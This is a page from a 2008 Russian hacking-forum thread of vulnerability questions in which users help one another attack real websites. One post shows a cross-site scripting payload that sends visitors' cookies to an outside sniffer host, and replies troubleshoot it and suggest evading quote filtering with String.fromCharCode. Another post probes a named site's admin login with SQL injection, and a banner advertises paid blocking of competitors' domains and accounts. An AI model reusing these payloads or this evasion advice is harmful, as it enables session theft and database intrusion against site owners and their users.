Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 142 из 2422

142

Опции темы

Поиск в этой теме

Опции просмотра

28.03.2008, 00:12

samarin

Участник форума

Регистрация: 24.02.2008

Сообщений: 136

Провел на форуме:
295283

Репутация: 69

Пытаюсь разобраться с xss но почему-то на снифер ничего не приходит. в исходнике страницы, какую открывает пишет:

Цитата:

<td class='tbl2' style='padding-left:10px;padding-right:10px;'><span class='small'><a href='settings_main.php`><script>img=new Image();img.src=\"http://s.netsec.ru/snif.gif?\" document.cookie;</script>'></a></span></td>
и т.д

что здесь не так?

Последний раз редактировалось samarin; 28.03.2008 в 00:58..

28.03.2008, 13:11

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Цитата:

Сообщение от samarin

Пытаюсь разобраться с xss но почему-то на снифер ничего не приходит. в исходнике страницы, какую открывает пишет:

что здесь не так?

ковычки попробуй убрать
<script>img=new Image();img.src=http://s.netsec.ru/snif.gif? document.cookie;</script>

28.03.2008, 13:13

desTiny

Reservists Of Antichat - Level 6

Регистрация: 04.02.2007

Сообщений: 1,152

Провел на форуме:
3008839

Репутация: 1502

Цитата:

Сообщение от samarin

img.src="http://s.netsec.ru/snif.gif?"+document.cookie;
по-моему...

__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ

28.03.2008, 13:16

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Цитата:

Сообщение от desTiny

img.src="http://s.netsec.ru/snif.gif?"+document.cookie;
по-моему...

там по-ходу фильтр на ковычки стоит, так что стоит попробовать без ковычек!

28.03.2008, 00:15

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Велемир
Поиск по форуму и пост от Constantine:
_http://forum.antichat.ru/showpost.php?p=500497&postcount=3638

28.03.2008, 12:48

hulk

Новичок

Регистрация: 27.01.2008

Сообщений: 6

Провел на форуме:
167725

Репутация: 1

Не подобрать столбцы

http://ktv-spb.ru/admin/aut.php?user=1'

28.03.2008, 13:10

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Цитата:

Сообщение от hulk

Не подобрать столбцы

http://ktv-spb.ru/admin/aut.php?user=1'

просто ошибка в БД, ничего выловить не сможешь

28.03.2008, 12:51

Анжелика

Познающий

Регистрация: 26.03.2008

Сообщений: 31

Провел на форуме:
208349

Репутация: 82

видимо там mysql 3 версии или кривой запрос
2 столбца, но юнион не работает

28.03.2008, 13:18

desTiny

Reservists Of Antichat - Level 6

Регистрация: 04.02.2007

Сообщений: 1,152

Провел на форуме:
3008839

Репутация: 1502

Ну тогда...
stringFromCharCode =)

__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ

#10

28.03.2008, 13:20

krypt3r

Познавший АНТИЧАТ

Регистрация: 27.04.2007

Сообщений: 1,044

Провел на форуме:
3660186

Репутация: 905

Кавычки, судя по всему, экранируются. Можно обойти с помощью String.fromCharCode()

Страница 142 из 2422

142

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules